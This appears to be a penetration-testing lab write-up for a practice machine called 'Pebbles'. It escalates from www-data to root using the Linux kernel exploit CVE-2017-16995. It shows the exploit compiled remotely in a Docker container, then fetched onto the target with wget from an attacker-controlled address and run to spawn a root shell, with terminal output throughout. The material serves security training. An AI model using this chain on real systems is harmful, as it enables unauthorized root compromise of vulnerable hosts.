CVE-2017-16995
PEAS has identified that the target system is vulnerable to CVE-2017-16995
/Practice/Pebbles/5-Privilege_Escalation/attachments/{A6743FA6-9A63-411F-BDC4-852D8097CEAD}.png)
A vulnerability classified as critical has been found in Linux Kernel up to 4.14.8 (Operating System). Affected is the function check_alu_op of the file kernel/bpf/verifier.c of the component Sign Extension. The manipulation with an unknown input leads to a memory corruption vulnerability. CWE is classifying the issue as CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This is going to have an impact on confidentiality, integrity, and availability.
Exploit
/Practice/Pebbles/5-Privilege_Escalation/attachments/{A84B3457-826D-46E0-BFF7-A66DC63677C6}.png)
Exploit found online
www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of themCompiler is not available locally. Opting out to remote compilation.
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Setting up the environment
root@ed4ffa517958:~# nano CVE-2017-16995.c
root@ed4ffa517958:~# gcc -O2 -Wall CVE-2017-16995.c -o CVE-2017-16995
CVE-2017-16995.c: In function 'pwn':
CVE-2017-16995.c:246:3: warning: ignoring return value of 'system', declared with attribute warn_unused_result [-Wunused-result]
system("/bin/bash");
^
root@ed4ffa517958:~# cp CVE-2017-16995 host/Compiling
Exploitation
www-data@pebbles:/var/tmp$ wget -q http://192.168.45.192/CVE-2017-16995; chmod 755 ./CVE-2017-16995Delivery complete
www-data@pebbles:/var/tmp$ ./CVE-2017-16995
task_struct = ffff88003d106e00
uidptr = ffff88003430ba84
spawning root shell
root@pebbles:/var/tmp# whoami
root
root@pebbles:/var/tmp# hostname
pebbles
root@pebbles:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise